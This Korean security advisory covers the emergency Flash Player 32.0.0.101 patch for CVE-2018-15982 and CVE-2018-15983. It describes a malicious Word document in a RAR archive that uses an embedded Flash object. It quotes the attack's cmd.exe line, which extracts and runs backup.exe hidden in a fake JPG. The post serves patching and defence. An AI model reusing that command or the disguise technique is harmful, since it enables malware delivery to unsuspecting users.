Flash 콘텐츠 재생을 위해 필수적으로 설치되는 Adobe Flash Player 플러그인에서 발견된 2건의 보안 취약점 문제를 해결한 Adobe Flash Player 32.0.0.101 버전이 긴급 업데이트 되었습니다.
사용자가 RAR 압축 파일 해제를 통해 MS Word 문서 파일을 실행할 경우 그림과 같이 재생 허용을 요구하는 경고창이 생성됩니다.
해당 경고창은 MS Word 프로그램의 기본 보안 기능으로 문서 내에 포함된 콘텐츠에 대한 추가적인 실행이 필요할 경우 허용 여부를 사용자에게 묻게 됩니다.
실제 MS Word 문서 내를 살펴보면 머리글 영역에 ShockwaveFlash 객체가 삽입되어 있는 것을 확인할 수 있으며, 해당 Flash 객체에 대한 실행을 허용할 경우 CVE-2018-15982 제로데이(0-Day) 취약점을 통해 코드 실행이 이루어집니다.
C:\WINDOWS\system32\cmd.exe /c set path=%ProgramFiles(x86)%\WinRAR;C:\Program Files\WinRAR; && cd /d %~dp0 & rar.exe e -o+ -r -inul *.rar scan042.jpg & rar.exe e -o+ -r -inul scan042.jpg backup.exe & backup.exe
실행된 코드를 확인해보면 MS Word 문서와 함께 압축된 scan042.jpg 파일을 WinRAR 압축 프로그램을 통해 해제하여 내부에 추가되어 있는 backup.exe 파일을 실행하는 구조입니다.
backup.exe 파일을 확인해보면 현재는 해지된 "IKB SERVICE UK LTD" 디지털 서명이 포함된 파일이며, NVIDIA Control Panel Application 파일처럼 아이콘 및 설명을 가지고 있습니다.
공격자는 해당 압축 파일을 전달받는 사용자가 WinRAR 압축 프로그램을 사용하고 있음을 알고 있는 상태에서 공격이 진행된 것으로 추정되며, 이를 통해 backup.exe 파일이 실행되면 추가적인 악성 바이너리 생성을 통해 외부 C&C 서버와 통신이 이루어지는 구조입니다.
- CVE-2018-15982 : Use-after-Free 취약점을 이용한 임의의 코드 실행 문제
- CVE-2018-15983 : 안전하지 않은 라이브러리 실행(DLL hijacking) 취약점을 이용한 권한 상승 문제
[영향을 받는 소프트웨어 및 업데이트 버전]□ Adobe Flash Player 31.0.0.153 버전 및 하위 버전(Windows, macOS, Linux) → Adobe Flash Player 32.0.0.101 버전□ Windows 8.1 운영 체제용 Internet Explorer 11 버전, Windows 10 운영 체제용 Internet Explorer 11 및 Microsoft Edge 웹 브라우저 사용자는 Windows 업데이트 기능을 통해 제공되는 Adobe Flash Player 보안 패치(KB4471331)를 설치하면 "Adobe Flash Player 31.0.0.153 버전 및 하위 버전 → Adobe Flash Player 32.0.0.101 버전"으로 업데이트 되었습니다.□ Windows, macOS, Linux, Chrome OS 운영 체제용 Chrome 웹 브라우저 사용자는 자동 업데이트(Chrome 맞춤설정 및 제어 → 도움말 → Chrome 정보) 기능을 통해 Chrome 71.0.3578.80 최신 버전으로 업데이트하시면 자체 내장된 PPAPI 기반 "Adobe Flash Player 31.0.0.153 버전 및 하위 버전 → Adobe Flash Player 32.0.0.101 버전"으로 업데이트될 예정입니다.
그러므로 Adobe Flash Player 플러그인이 설치된 환경에서는 Windows 업데이트 또는 설치 파일을 이용하여 최신 버전으로 업데이트하시기 바라며, 특히 다중 웹 브라우저 사용자는 각 웹 브라우저용 Adobe Flash Player 버전을 체크하여 최신 버전으로 업데이트하시기 바랍니다.